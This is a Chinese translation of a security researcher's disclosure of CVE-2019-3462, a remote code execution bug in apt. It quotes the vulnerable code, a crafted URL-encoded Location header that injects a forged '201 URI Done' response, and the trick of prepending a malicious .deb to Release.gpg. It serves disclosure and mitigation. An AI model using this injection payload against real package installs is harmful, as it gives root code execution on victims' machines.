1. 威客安全首页
  2. 安全资讯

apt apt-get中的远程执行代码

apt apt-get中的远程执行代码


原文:https://justi.cz/security/2019/01/22/apt-rce.html
作者:Max Justicz
译者:Nanako@知道创宇404实验室


TL,DR:


我在apt中发现了一个漏洞,它允许网络中间人(或恶意包镜像)以root身份在安装软件包的机器上执行任意代码。该漏洞已在apt最新版本中被修复。如果您担心在更新过程中被利用,可以通过禁用http重定向来保护自己。为此,请运行:

$ sudo apt update -o Acquire::http::AllowRedirect=false

$ sudo apt upgrade -o Acquire::http::AllowRedirect=false


如果当前镜像包在默认情况下重定向(意味着出现该标志时无法更新apt),则需要选择其它镜像或直接下载程序包。该链接[1]可以找到有关Debian升级的具体说明。Ubuntu的声明可以在这里[2]找到。


作为证明,我录制了一段攻击如下Dockerfile的视频:

FROM debian:latest

RUN apt-get update && apt-get install -y cowsay




背 景


在获取数据时,apt将各种不同的数据传输协议的工作进程分离。然后,父进程通过stdin/stdout与这些工作进程进行通信, 利用一个类似http的协议告诉他们要下载的内容并将它放到文件系统上。例如,在一台机器上运行 apt install cowsay并用http请求下载相应包的时候,apt将提供/usr/lib/apt/methods/http目录,并返回100 Capabilities消息:

100 Capabilities

Version: 1.2

Pipeline: true

Send-Config: true


然后,父进程发送其配置并请求资源,如下所示:

601 Configuration

Config-Item: APT::Architecture=amd64

Config-Item: APT::Build-Essential::=build-essential

Config-Item: APT::Install-Recommends=1

(…many more lines omitted…)

600 URI Acquire

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Filename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.deb

Expected-SHA256: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831

Expected-MD5Sum: 27967ddb76b2c394a0714480b7072ab3

Expected-Checksum-FileSize: 20070


然后工作进程会像下方这样响应:

102 Status

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Message: Connecting to prod.debian.map.fastly.net

102 Status

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Message: Connecting to prod.debian.map.fastly.net (2a04:4e42:8::204)

102 Status

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Message: Waiting for headers

200 URI Start

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Size: 20070

Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000

201 URI Done

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Filename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.deb

Size: 20070

Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000

MD5-Hash: 27967ddb76b2c394a0714480b7072ab3

MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3

SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831

Checksum-FileSize-Hash: 20070


当http服务器根据重定向进行响应时,工作进程返回103 Redirect而非201 URI Done。父进程根据此响应来确定接下来应该请求的资源:

103 Redirect

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

New-URI: http://example.com/new-uri



漏 洞


不幸的是,进行http下载的进程会对HTTP Location头进行url解码,并直接附加到103 Redirect响应中:

// From methods/basehttp.ccNextURI = DeQuoteString(Req.Location);…Redirect(NextURI);

// From apt-pkg/acquire-method.ccvoid pkgAcqMethod::Redirect(const string &NewURI){

   std::cout << “103 RedirectnURI: ” << Queue->Uri << “n”

             << “New-URI: ” << NewURI << “n”

             << “n” << std::flush;

   Dequeue();}


(注意:不同版本的apt之间存在重要差异。上述代码来自Debian最近使用的1.4.y版本。一些Ubuntu版本使用的是1.6.y,它不仅仅是直接附加URI。然而在后续的http提取程序发出的600 URI Acquire请求中仍然存在注入漏洞。其他版本我并没有做检查。)


因此,如果http服务器发送Location: /new-uri%0AFoo%3A%20Bar,http提取进程将回复以下内容:

103 Redirect

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

New-URI: http://deb.debian.org/new-uri

Foo: Bar


或者,如果http服务器发送:

Location: /payload%0A%0A201%20URI%20Done%0AURI%3A%20http%3A//deb.debian.org/payload%0AFilename%3A%20/var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg%0ASize%3A%2020070%0ALast-Modified%3A%20Tue%2C%2007%20Mar%202017%2000%3A29%3A01%20%2B0000%0AMD5-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0AMD5Sum-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0ASHA256-Hash%3A%20858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831%0AChecksum-FileSize-Hash%3A%2020070%0A


那么http提取进程会回复:

103 Redirect

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

New-URI: http://deb.debian.org/payload

201 URI Done

URI: http://deb.debian.org/payload

Filename: /var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg

Size: 20070

Last-Modified: Tue, 07 Mar 2017 00:29:01 +0000

MD5-Hash: 27967ddb76b2c394a0714480b7072ab3

MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3

SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831

Checksum-FileSize-Hash: 20070



注入恶意包


因为我在我的验证程序中注入201 URI Done响应,所以我不得不处理没有下载任何包的问题。我需要一种方法让恶意的.deb进入系统,以便在Filename参数中使用。


为了实现这点,我利用了apt updaterelease.gpg文件可以被修改,并安装在可预测的位置这个特点。具体来说,Release.gpg包含的PGP签名,如下所示:

—–BEGIN PGP SIGNATURE—–

—–END PGP SIGNATURE—–


只要注入的内容不接触到签名内容,apt的签名验证程序就不会报错,所以我拦截了release.gpg请求,并用我的恶意deb进行了预处理:

<oops.deb contents>

—–BEGIN PGP SIGNATURE—–

—–END PGP SIGNATURE—–


然后,我在201 URI Done响应中设置Filename参数:

/var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg



http / https争议


默认情况下,Debian和Ubuntu都使用开箱即用的http存储库(Debian允许您在安装过程中选择所需镜像,但实际上不支持https存储库 – 您必须先安装apt-transport-https)。


如果程序包清单已签名,为什么还要使用https?毕竟,由于包的大小有限,隐私获益是最小的。而且使用https会使缓存受限。


也有对此很感兴趣的人。某些网站专门解释为什么在apt上下文中使用https没有意义。


这些都是很好的观点,但是我这篇文章中的bug是存在的。无独有偶——这是JannHorn在2016年发现的另一个具有相同影响的bug[3]。没错,即使使用的是https,恶意镜像依然可以利用这样的漏洞。但我觉得,与其攻击使用http或TLS证书的deb.debian.org,还不如直接攻击目标服务器上的应用服务。


(假设apt-transport-https本身没有灾难性的破坏。我并没有审计,但它看起来像是围绕libcurl的一个相对较薄的包装。)


支持http是个好事。我只是认为把https作为更安全的默认存储库是值得的,如果用户选择这样做的话,允许他们降低安全级别。如果服务器包默认使用的是https,我就无法利用本文顶部的dockerfile。


总 结


感谢apt维护者及时修补此漏洞,并感谢Debian安全团队协助披露。这个漏洞已经注册编号:CVE-2019-3462。



🔗

相 关 链 接


  1. https://lists.debian.org/debian-security-announce/2019/msg00010.html

  2. https://usn.ubuntu.com/3863-1/

  3. https://www.debian.org/security/2016/dsa-3733



apt apt-get中的远程执行代码 

往 期 热 门


apt apt-get中的远程执行代码  apt apt-get中的远程执行代码

原文始发于微信公众号(Seebug漏洞平台):apt apt-get中的远程执行代码

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

4006-119-120

在线咨询:点击这里给我发消息

邮件:public@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

X